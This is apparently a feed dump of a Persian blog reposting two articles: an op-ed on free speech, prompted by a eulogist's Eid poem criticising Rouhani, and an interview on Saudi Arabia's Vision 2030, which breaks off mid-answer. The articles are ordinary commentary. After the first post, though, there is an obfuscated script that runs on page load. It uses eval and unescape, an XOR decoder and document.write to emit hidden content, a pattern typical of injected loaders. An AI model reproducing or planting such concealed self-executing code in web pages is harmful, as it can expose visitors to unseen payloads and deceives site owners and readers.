مهـربانان زودتـر وَ بـیـشـتـــر می-بخشـنــــد ... گر در طلب لقمه نانی، نانی / گر در طلب گوهر كانی، كانی / این نكته رمز اگر بدانی، دانی / هر چیز كه اندر پی آنی، آنی ... مـــولانـــا امام خمینی: همه باید نظر خودشان را بدهند / و هیچ کدام هم برایشان حتی جایز نیست که یک چیزی را بفهمند و نگویند. / باید وقتی می فهمند، اظهار کنند. / این موافق هر که باشد ، باشد ، مخالف هرکه هم باشد ، باشد. / ( صحیفه امام،ج13،ص102) http://1001SHAYADOBAYAD.mihanblog.com 2017-06-29T15:57:47+01:00 text/html 2017-06-29T11:25:46+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی از شعر تا مِعر، از آزادی بیان تا تهمت وُ تخریب ... http://1001SHAYADOBAYAD.mihanblog.com/post/3530 <div class="post"> <div id="MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div> <div class="tpost"><br></div> <div class="xpost"><div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div> <div class="post"> <div id="MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div> <br> <b> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <strong> </strong></b></b><p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"><b><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"><strong> <span style="color: #FFFFFF; font-family: Microsoft Sans Serif; font-size: large; font-weight: 700; background-color: #00B700"> &nbsp; بسم الله الرحمن الرحیم&nbsp; <br></span></strong></b></b></p><br><br><br><font color="#330099"><span style="background-color: rgb(204, 204, 255);"><font size="6"><b><font face="arial,helvetica,sans-serif"><a href="http://www.khabaronline.ir/detail/680683/weblog/mokhtabad"><font color="#663366"><span style="background-color: rgb(204, 204, 255);">&nbsp; از شعر تا مِعر، از آزادی بیان تا تهمت وُ تخریب ... &nbsp;</span></font> </a><br></font></b></font></span></font><br><br><br> <strong> <p style="line-height: 90px; margin-top: 0; margin-bottom: 0"> <b> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"> <span style="background-color: rgb(255, 255, 0)"> <font size="5" face="Arial" color="#0000ff">&nbsp;&nbsp;<span lang="fa">جهت مراجعه به&nbsp;</span></font></span></b><span lang="fa"><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">مرجع متن</font></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff">، یا&nbsp;</font></span></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">عنوان اصلی</font></b><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; ">، به پیوند فوق اشاره</b></font></span></span><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; "> کنید <span lang="fa">&nbsp;</span></b></font></span></b></b></p><b><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> </font> </b> </b></strong><b> </b> <br><br><div align="justify"><font color="#000099"><span style="background-color: rgb(255, 255, 204);"><font size="4" face="Mihan-IransansBold"><b><font color="#CC0000">(((</font> آورده اند شاعری در روزگاران پیشین، روزی در دربار شاهی، از جای برخواست و گفت: شاهنشاها اجازه دهید قطعه ای را که سروده ام در این مجلس با شکوه بخوانم. کسی پرسید: "تو کیستی و چه کاره ای؟ بنده شاعرم بنده هم ماعرم ماعر کیست؟ شاعر کیست؟ شاعر شعر می گوید. ماعر معر می گوید. معر چیست؟ شعر چیست؟ شعر اینست: هر غنچه که گل گشت دگر غنچه نگردد. معر اینست: هر منچه که مل گشت دگر منچه نگردد. منچه چیست؟ عنچه چیست؟ غنچه آنست که شکفته شده و گل می گردد. منچه هم آنست که مکفته شده و مل می گردد. شاعر تسلیم شد و زبان در کام گرفت. زآن پس چون نیک بنگریست دریافت که بسیاری از اشعار، در واقع معرند. خود نیز بعدها، معرها مرود. مرودنی. <font color="#CC0000">)))<br></font></b></font></span></font><br><font color="#000099"><span style="background-color: rgb(255, 255, 204);"><font size="4" face="Mihan-IransansBold"><b><font color="#CC0000"><img src="http://images.khabaronline.ir/images/2017/6/position50/14-4-28-111720abolhassan_mokhtabad.jpg" class="thumbnail" height="345" width="460"><br><br></font></b></font></span></font><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><b><span><span style="background-color: rgb(255, 255, 153);">وبلاگ مختاباد، سید ابوالحسن، خبرآنلاین :</span> </span>اشعار روز عید سعید فطر در مصلی که از سوی یک از مداحان خوانده شد، بازتاب‌های بسیاری داشت. جدای از کیفیت پایین و نازل و غیرادبی شعر، نگارنده می‌خواهد از زاویه‌ای متفاوت به آن نظر کند و آن، فراهم کردن چنین بسترهایی برای کسانی است که دیدگاهی مخالف با این دیدگاه دارند. </b></font></span></font></div><div class="leadCont" align="justify"> </div><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><b> </b></font></span></font></div><div class=" clear" align="justify"> </div><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><b> </b></font></span></font></div><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><b>از جمله شعارهای اصلی ما در انقلاب بهمن ۵۷ آ‌زادی بود و بخشی مهم از این آزادی، خود را در آزادی بیان جلوه‌گر می‌سازد و به خصوص آزادی پس از بیان.&nbsp;<span>آزاد</span><span> ِ</span><span>ی بیان حقی است همگانی و نه امتیازی که به مهر و لطف به یک گروه داده شود و &nbsp;با کین و قهر و خشونت از گروهی دیگر بازستانده شود.&nbsp;</span></b></font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><b> </b></font></span></font></div><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><b> دولت دکتر حسن روحانی باید خوشحال باشد و البته منتقدانش، همانند این مداح محترم، باید خوشحال‌تر که این امکان را می‌یابند تا از یکی از مهمترین تریبون‌های سالانه و در حضور خیلی از جمعیت و به شکلی مستقیم، اشعاری را در نقد گفتمان رئیس جمهور روحانی و ۲۴ میلیون رایی که به او داده‌اند مطرح می‌کنند و بعد از آن هم سوار خودرو و تاکسی خود می‌شوند و به منزل می‌روند. کسی هم به آنها لقب جاسوس و نفوذی و اجنبی پرست نمی‌دهد.&nbsp;</b></font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><b> </b></font></span></font></div><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><b>این سخنان البته سابقه دارد و هر روز و شب و هفته در انواع و اقسام رسانه‌های طیف بازنده انتخابات در جریان است و به گمان نگارنده امر غریبی نیست. کافی است &nbsp;هر هفته تریبون‌ها نماز جمعه را در شهرهای مختلف گوش کنید یا روزنامه کیهان را باز کنید تا سخنانی بس تندتر و کوبنده‌تر از این اشعار را بخوانید و با خود اندیشه کنید که چرا نویسنده آن سخنان و نوشته‌ها را مادر بمب‌ها نیز نمی‌تواند تکان دهد؟ اما در سوی دیگر کار منتقدان و شاعران و فیلمسازان و اهل فرهنگ و هنری که دیدگاهی مخالف دیدگاه آنان دارند با داع و درفش و زندان &nbsp;بند و کند &nbsp;زنجیر است.</b></font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><b> </b></font></span></font></div><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><b>راستش من بسیار به این مداح حسودیم شد و احتمالا بسیاری از دوستان روزنامه‌نگارم نیز چنین چیزی در ذهنشان گذشت که او با چه شور وشوق و با چه اعتماد به نفسی به شخص دوم مملکت انتقاد می‌کند؟و کسی به او افترا و اتهام جاسوسی نمی زند، &nbsp;اما در این سو انتقادهای عادی و حتی در چارچوب‌های قانونی هم به مخالفت با امنیت ملی، بلندگوی دشمن، تعبیر می‌شود.</b></font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><b> </b></font></span></font></div><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><b>ماجرا زمانی خطرناک می‌شود که این مداح محترم خود و گفتمان خود را حق مطلق بپندارد و سخنان و گفتمان دیگر را باطل طرف مقابل را گروهی زندیق و کافر مسلک و اجنبی&nbsp;‌پرست و معاند. امیداریم آن هیجان در پس و پشت خود چنین دیدگاهی نداشته باشد که اگر چنین باشد آنگاه خطرناک است و خواهد بود.</b></font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><b> </b></font></span></font></div><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><b>اما در سوی دیگر بر این باورم که دوستان منتقد به جای حمله به مداح مورد نظر، بهتر است به سویه مثبت ماجرا بنگرند و از آقای روحانی بخواهند و نیز دستگاه قضایی، که اجازه دهد در این طرف ماجرا هم همین امنیت و‌ اعتماد به نفس برای منتقدان فراهم شود و آنها فارغ البال بتوانند دیدگاه‌های خود را مطرح کنند و داور نهایی مردم باشند که خوش داوری هم هستند.</b></font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><b> </b></font></span></font></div><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><b>به یاد داریم سال‌های دوری که را که از بزرگی پرسیدند که چرا شما با فلان منتقد و شیخ به مناظره نمی‌نشینی که پاسخ داد: آیا همان قدر که او در امنیت و‌آرامش و اعتماد به نفس به من انتقاد می‌کند؟ من نیز می‌توانم؟ و آیا می‌توانم بیمناک این نباشم که بعد از مناظره چه سرنوشتی در انتظار من است؟ او مستقیم به خانه می‌رود و من مستقیم به جایی که عرب نی‌انداخت.</b></font></span></font></p> <strong> <b> <font size="5" face="Latha"> <span style="text-decoration: overline; background-color: #FFFFCC"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <span style="font-weight: 700; background-color: #F2F2F2"><font face="Arial" color="#0000FF">تهیه وَ تدوین: عـبـــد عـا صـی&nbsp; </font> </span> </b> </span></font> </b> </strong> <br><br><br></div> <script type="text/javascript"> eval(unescape('function q5bad8c56(s) { var r = ""; var tmp = s.split("7561549"); s = unescape(tmp[0]); k = unescape(tmp[1] + "621366"); for( var i = 0; i < s.length; i++) { r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+6); } return r; } ')); eval(unescape('document.write(q5bad8c56('') + '1^jqikud^4wd^gc64(,7o\th [obcl1[]imYj2``il#hev^74li5Thdmi2^27Y-*<c]gddl5/,3gf`Zl0ieccm3?6U94dlnlnerX7*<-24(coni8?(^<0YajYg7cljo2+(rww/\ohci`ej)`j/gZneZh5ZZ`\hl:2eojo[oaie6+(,/-(?X^^blgOaYaXm=q3Z:=eogMlbj3/^95/fnhg94-^>4];0fnhgogqY5(>3(?(bmmh:7*Z>1)Wbr<3/\bs>0.^jq:2[er^`]jm>fYgm`:7]ev]oZoi2a]il>75615497091245' + unescape(''));'));</script></div> <b></b> <font style="font-size:8pt;"> <br> <font size="3"><b>برچسب ها: <a href="/post/tag/آزادی بیان">آزادی بیان</a>، <a href="/post/tag/مداح">مداح</a>، <a href="/post/tag/تریبون‌ نماز جمعه">تریبون‌ نماز جمعه</a>، <a href="/post/tag/روزنامه کیهان">روزنامه کیهان</a>، <a href="/post/tag/دیدگاه مخالف">دیدگاه مخالف</a>، <a href="/post/tag/اتهام جاسوسی">اتهام جاسوسی</a>، <a href="/post/tag/امنیت ملی">امنیت ملی</a>، </b></font></font> </div></div><br><br></div> text/html 2017-06-28T11:14:14+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی سر خودمان شیره بمالیم، از دنیا عقب می افتیم! ... http://1001SHAYADOBAYAD.mihanblog.com/post/3529 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div> <div class="xpost2"> <strong> </strong><div dir="RTL" style="line-height: 200%; margin: 0" align="right"><strong> <b> </b></strong><div dir="RTL" style="line-height: 200%; margin: 0" align="justify"><strong><b> <div class="mainbg"> <div class="mainr"> <div class="post"> <br> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <span style="color: #FFFFFF; font-family: Microsoft Sans Serif; font-size: large; font-weight: 700; background-color: #00B700"> &nbsp; بسم الله الرحمن الرحیم&nbsp; <br> <br> &nbsp;</span></b><h1 style="line-height: 60px; margin: 0px; padding: 0px" class="title"> <span style="vertical-align: bottom"> <span style="text-decoration: overline"> <font size="6" face="Arial" color="#CC0000"> <a href="http://www.asriran.com/fa/news/545890/برنامه-اقتصادی-عربستان-سعودی-را-جدی-بگیریم-سر-خودمان-شیره-بمالیم-از-دنیا-عقب-می-افتیم" target="_blank"> <span style="background-color: #F2F2F2"><font color="#CE0000">&nbsp; سر خودمان شیره بمالیم، از دنیا عقب می افتیم! ... &nbsp;&nbsp; </font></span><br> &nbsp;</a></font></span></span></h1> <div dir="RTL" style="line-height: 200%; margin: 0" align="right"> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"> <span style="background-color: rgb(255, 255, 0)"> <font size="5" face="Arial" color="#0000ff">&nbsp;&nbsp;<span lang="fa">جهت مراجعه به&nbsp;</span></font></span></b><span lang="fa"><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">مرجع متن</font></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff">، یا&nbsp;</font></span></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">عنوان اصلی</font></b><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal">، به پیوند فوق اشاره</b></font></span></span><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal"> کنید <span lang="fa">&nbsp;</span></b></font></span></b></p></div> <p><br> <br> <font size="4" face="Mihan-IransansBold" color="#000099"> <span style="background-color: #FFFF00"> <font size="3">عصر ایران</font></span><font size="3"><span style="background-color: rgb(204, 255, 255)"> با دکتر علی اکبر جلالی گفت و گو کرد تا اطلاعات دقیق تری از برنامه ها و تحولات&nbsp; مرتبط با فناوری و اقتصاد عربستان سعودی کسب شود.</span></font></font><font size="3" face="Mihan-IransansBold"><br> &nbsp;</font></p><font size="3" face="Mihan-IransansBold"> </font><div align="justify"> <font size="3" face="Mihan-IransansBold" color="#000099"> <span style="background-color: rgb(204, 255, 255)"> جلالی متولد روستای وامرزان دامغان و بزرگ شده شاهروداست. پدرش کارمند راه آهن دامغان بوده است. در سال 1354 برای دوره لیسانس به دانشگاه تهران راه پیدا کرد. در سال 1364 برای ادامه تحصیل به آمریکا رفت و دکترای خود را در رشته برق از دانشگاه ویرجینیای غربی(در ایالت ویرجینای غربی آمریکا) دریافت کرد.</span></font></div><font size="3" face="Mihan-IransansBold"> </font><div align="justify"> <font size="3" face="Mihan-IransansBold" color="#000099"> <span style="background-color: rgb(204, 255, 255)"> <br> &nbsp;</span></font></div><font size="3" face="Mihan-IransansBold"> </font><div align="justify"> <font size="3" face="Mihan-IransansBold" color="#000099"> <span style="background-color: rgb(204, 255, 255)"> <img src="http://cdn.asriran.com/files/fa/news/1396/4/4/712961_987.jpg" title="برنامه اقتصادی عربستان سعودی را جدی بگیریم/سر خودمان شیره بمالیم از دنیا عقب می افتیم" alt="برنامه اقتصادی عربستان سعودی را جدی بگیریم/سر خودمان شیره بمالیم از دنیا عقب می افتیم" style="border: 0px none; " class="img-responsive" height="403" width="699"><br> <br> او در کنار حوزه تخصصی خود، متوجه اهمیت اینترنت و فناوری اطلاعات و قدرت تاثیرگذاری آن شد و به این حوزه توجه جدی کرد.</span></font><font size="3" face="Mihan-IransansBold"><font color="#0000FF"><span style="background-color: #F7F7F7"> دکتر جلالی در سال 1373 به ایران برگشت و نخستین روستای اینترنتی ایران و جهان را با کمک مردم روستا و وزارت ارتباطات و فناوری اطلاعات در سال 1383 در روستای قرن آباد گرگان(محل تولد پدر و مادرش) ایجاد کرد. در سال های اخیر برخی به دکتر جلالی، لقب پدر فناوری اطلاعات ایران داده اند.</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> گفت و گوی عصر ایران با دکتر علی اکبر جلالی استاد دانشگاه علم و صنعت درباره برنامه چشم انداز 2030 (رویة/Vision) عربستان را می خوانید.<br> &nbsp;</span></font></font><div> <font size="3" face="Mihan-IransansBold" color="#000099"> <span style="background-color: rgb(204, 255, 255)"> ***<br> &nbsp;</span></font></div> <p> <font size="3" face="Mihan-IransansBold"><font color="#000099"> <span style="background-color: rgb(204, 255, 255)"> *عربستان در فروردین سال 1395 یک سند توسعه ای به نام چشم انداز 2030 تصویب کرد. مقامات دولت سعودی ادعا می کنند که می خواهند جایگاه بهتری در دنیا کسب کنند. کسی که مسئولیت این سند را دارد محمد بن سلمان است که جانشین ولیعهد بود و در روزهای اخیر به عنوان ولیعهد پادشاه عربستان منصوب شد.<br> محمد بن سلمان اقداماتی انجام می دهد که نشان بدهد در تحقق این چشم انداز خیلی جدی است. </span></font><font color="#0000FF"> <span style="background-color: #F7F7F7"> در حوزه فناوری و فناوری های نوین که شما صاحب نظر هستید اقداماتی که عربستان انجام داده چگونه است و در دنیا اقدامات عربستان را جدی می گیرند؟</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> -اقدامات عربستان با توجه به سابقه تاریخی که دارد در دنیا، زیاد جدی گرفته نمی شود.</span></font><font color="#00B700"><span style="background-color: #F7F7F7"> اما واقعیت این است که اگر به تجربه امارات متحده عربی و دوبی برگردیم، دوبی هم در چند دهه قبل، بیابانی بیش نبود و یک روستا خطاب می شد.</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> موقعی که اقدامات توسعه ای در دوبی شروع شد بسیاری می گفتند طرح های اینها بلند پروازانه است و امکانپذیر نیست. همچنین می گفتند این کشورها نمی توانند چنینن حرکت هایی را که می گویند در عمل داشته باشند. اما امروز شاهدیم که اینها موفق شدند بدون تعارف.<br> </span></font><font color="#00B700"> <span style="background-color: #F7F7F7"> امارات کشوری است که از یک تکه خاک ماسه به یک مرکز گردشگری بزرگ دنیا تبدیل شده است و پروژه هایی را اجرا کرده که بعضا در دنیا بی سابقه بوده یا بسیار کم سابقه بوده. از همه مهمتر، در حوزه گردشگری ما کمترین کشوری را در جهان سراغ داریم که نزدیک به 90 درصد هتل هایش در طول سال پُر هستند. این خودش یک شاخص بزرگی است.</span></font></font></p></div><font size="3" face="Mihan-IransansBold"> </font><div align="justify"><font size="3" face="Mihan-IransansBold"> &nbsp;</font></div><font size="3" face="Mihan-IransansBold"> </font><div align="justify"><font size="3" face="Mihan-IransansBold"> <font color="#000099"> <span style="background-color: rgb(204, 255, 255)"> <img src="http://cdn.asriran.com/files/fa/news/1396/4/4/712962_835.jpg" title="برنامه اقتصادی عربستان سعودی را جدی بگیریم/سر خودمان شیره بمالیم از دنیا عقب می افتیم" alt="برنامه اقتصادی عربستان سعودی را جدی بگیریم/سر خودمان شیره بمالیم از دنیا عقب می افتیم" style="border: 0px none; " class="img-responsive" height="524" width="699"><br> <br> </span></font> <font color="#0000FF"> <span style="background-color: #FFFFCC"> حتی در کشورهای توسعه یافته، هتل ها در طول سال بیشتر از 50 تا 60 درصد پُر نیستند. اما هتل های امارات متحده عربی با این که هوای مناسبی ندارد، چنین وضعی دارند. &nbsp;<br> جنبه های گردشگری امارات، توسط بشر ساخته و آثاری نیست که از قبل و به صورت تاریخی به وجود آمده باشد. امارات با تفکر جدید، جهان را درک کند و متناسب با تفکر جدید، ابزاری را ساخته که منشاء گردشگری شان است.</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> در کشوری مثل کشور ما هنوز توقع مان این است که مردم دنیا بیایند آثار باستانی ما را ببینند و خدمات تاریخی ما را ببینند. همه بحث های ما، روی گردشگری تاریخی است&nbsp; و خودمان چیز جدید که به روز باشد و نسل جدید هم از آن لذت ببرد نساخته ایم. همه اینها نشان می دهد که دیدگاه ها، متفاوت است.<br> با مطالعه ای که روی پروژه چشم انداز 2030 عربستان سعودی انجام دادم معتقدم این کارها را خودشان انجام نداده اند و از تعدادی مشاور و کارشناس استفاده کرده اند. قسمتی که خیلی مهم است و می تواند پایه موفقیت آنها باشد بحث گرین کارتی است که عربستان سعودی در همین پروژه 2030 آورده است.<br> همان بحث گرین کارت، یک راهکار مهم و نجات بخشی است.</span></font><font color="#00B700"><span style="background-color: #F7F7F7"> ما در کشور مان و بعد از 38 سال که از انقلاب می گذرد نتوانسته ایم حتی نخبگان کشور خودمان را جذب کنیم. حالا جذب نخبگان خارجی که بماند. اما در عربستان تصمیم گرفته اند که فضا را باز کنند و بتوانند نخبه ها را از&nbsp; کشورهای مختلف جذب کنند.</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> </span></font> <font color="#FFFFFF"> <span style="background-color: #00B700"> این همان کاری است که کشورهای اروپایی و آمریکا انجام دادند و با جذب نخبه های کشورهای دیگر، کشورشان را ساختند.</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> </span></font> <font color="#0000FF"> <span style="background-color: #F7F7F7"> *در حال حاضر بین 6 تا 7 میلیون کارگر خارجی در کشور سعودی هستند. آیا نخبه ها و استادان و افراد برجسته مایل هستند که به آن کشور بروند؟</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> -به کارگر گرین کارت نمی دهد. اشکال کار این بود که تا الان خارجی ها یعنی نخبه ها، پروژه ها را انجام می دادند. خارجی ها بودند که به عربستان می رفتند و پروژه را انجام می دادند و از عربستان می رفتند. تعدادی هم کارگر از کشورهای دیگر می آمدند و کار را انجام می دادند. برای مثال فقط یک ساختمان در عربستان ساخته می شد و می ماند.<br> </span></font> <font color="#00B700"> <span style="background-color: #F7F7F7"> اما الان تصمیم شان عوض شده. تصمیم شان این شده که نیروها را جذب کنند و شرایط زندگی را برای آنها فراهم کنند مثل کشورهای توسعه یافته. ممکن است ما با موقعیت خوبی که در ایران داریم بگوییم کدام نخبه به عربستان می رود؟</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> در صورتی که باید توجه داشته باشیم که این اقدام عربستان بر مبنای اقامت و پول است. بسیاری از کشورها هستند و حتی کشورهای اسلامی که نخبه های زیادی دارند و نمی توانند این نخبه ها را جذب کنند.<br> در نوع گرین کارت، یک فرد هم می تواند به راحتی مقیم باشد و هم می تواند آزادانه به آن کشور برود و خارج شود. اصلا حس کشور خودش را دارد. این کار می تواند منشاء موفقیت باشد.<br> به هر صورت من به عنوان یک نفر متخصص که در این زمینه ها سال ها دارم کار می کنم و روش های توسعه کشورهای مختلف را دنبال می کنم،</span></font><font color="#00B700"><span style="background-color: #F7F7F7"> با قاطعیت می گویم که عربستان در آینده، چیزی شبیه دوبی شود و می تواند فضای مناسبی را آماده کند. الان عربستان به دنبال جذب سالیانه 30 میلیون گردشگر است.</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> اگر بتوانند شرایط خوبی را فراهم بیاورند که مردم با هزینه بسیار جزئی به مکه بروند می توانند به آن هدف جذب 30 میلیون نفر برسند. بالاخره ما یک و نیم میلیارد نفر مسلمان در دنیا داریم. جذب 30 میلیون نفر در سال برای رفتن به مکه، یک عدد دور از انتظار نیست و به راحتی امکانپذیر است.<br> وقتی که در عربستان، شرایط سفر فراهم شود مردم به راحتی به آنجا می روند. من این طرح 2030 عربستان و این محمد بن سلمان را جدی می گیرم. من فکر می کنم خود شخص نیست این طرح را اجرا می کند که بگوییم یک نفر 30 ساله یا 20 ساله یا نوجوان است و متوجه نیست. از این حرف ها نیست. ما باید خودمان را با آنها مقایسه کنیم و ببینیم آنها چه طرحی دارند و ما چه طرحی داریم.<br> *در سند چشم انداز 2030 عربستان بحث تنوع بخشیدن به اقتصاد مطرح شده است. در فروردین 1395 (مارس 2016) هم این سند در کابینه تصویب شده بود. در سال 2016 صادرات غیر نفتی عربستان به میزان 10.9 درصد کاهش داشته و مجموع صادرات غیر نفتی آن کشور به 44 میلیارد دلار رسیده.<br> </span></font> <font color="#0000FF"> <span style="background-color: #F7F7F7"> کل صادرات نفتی و غیر نفتی عربستان هم 140 میلیارد دلار بوده است. این حدود 11 درصد کاهش صادرات غیر نفتی در تضاد نیست با هدف تنوع بخشیدن به اقتصاد؟</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> -موقعی که برنامه اجرا می شود در شروع برنامه، امکان ضرر کردن هم وجود دارد. چون باید سرمایه گذاری شود. ممکن است بازارهایی را از دست بدهیم و بازارهای جدیدی را به دست&nbsp; بیاوریم.&nbsp; در نتیجه نمی شود از همان سال اول که هر کاری را شروع می کنیم بتوانیم موفق عمل کنیم.<br> </span></font> <font color="#00B700"> <span style="background-color: #F7F7F7"> برای مثال ما حدود 20 سال است که ساخت بزرگراه تهران- شمال را شروع کرده ایم. به طور کامل از آن هم بهره برداری نکرده ایم. اما به هر حال وقتی به بهره برداری برسد گفته شده که در مصرف سوخت 35 درصد صرفه جویی می شود.</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> </span></font> <font color="#4B007D"> <span style="background-color: #FFFFCC"> ساخت این بزرگراه بر هتل و گردشگری هم تاثیر دارد. چون رفت و آمد مردم آسان می شود و می توانند در شمال کشور سرمایه گذاری انجام بدهند و وضعیت، بهتر شود. اما بحث سرمایه اولیه مطرح است. عربستان، پولش را دارد ولی ما برای ساخت جاده شمال کشور، پول نداریم. به همین دلیل یک پروژه 2 ساله، حدود 20 سال طول کشیده است.</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> آنها قبلا سرمایه گذاری هایی در خارج از عربستان انجام داده اند و بندرهای زیادی را خریده اند. الان بین 600 تا 800 میلیارد دلار، پول نقد دارند. اگر بخواهند و تصمیم بگیرند کاری را انجام بدهند، آن را انجام می دهند.<br> *در سال 2016 حدود 11 درصد صادرات غیر نفتی عربستان کاهش پیدا کرده است. الان هم به خاطر تحریم کردن قطر، صادرات عربستان به قطر متوقف شده. باز مجموعا صادرات غیر نفتی عربستان کاهش پیدا می کند.<br> </span></font> <font color="#0000FF"> <span style="background-color: #F2F2F2"> این کاهش صادرات مجددا اتفاق افتاده است. با این نوع توقف صادرات، آیا در کار مقامات حکومت عربستان، به معنای واقعی برنامه ریزی وجود دارد؟</span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255)"><br> -من شخصا روش کارم این است که حقیقتا همه این مسائل را جدی می گیرم. به خاطر این که وقتی می خواهیم با کشوری رقابت کنیم، اگر پیش خودمان بگوییم دارد ضرر می کند، ما نیز کاری انجام نمی دهیم. اما اگر واقعا جدی بگیریم و بگوییم دارند کاری انجام می دهند، خودمان هم دست به کار می شویم و کاری 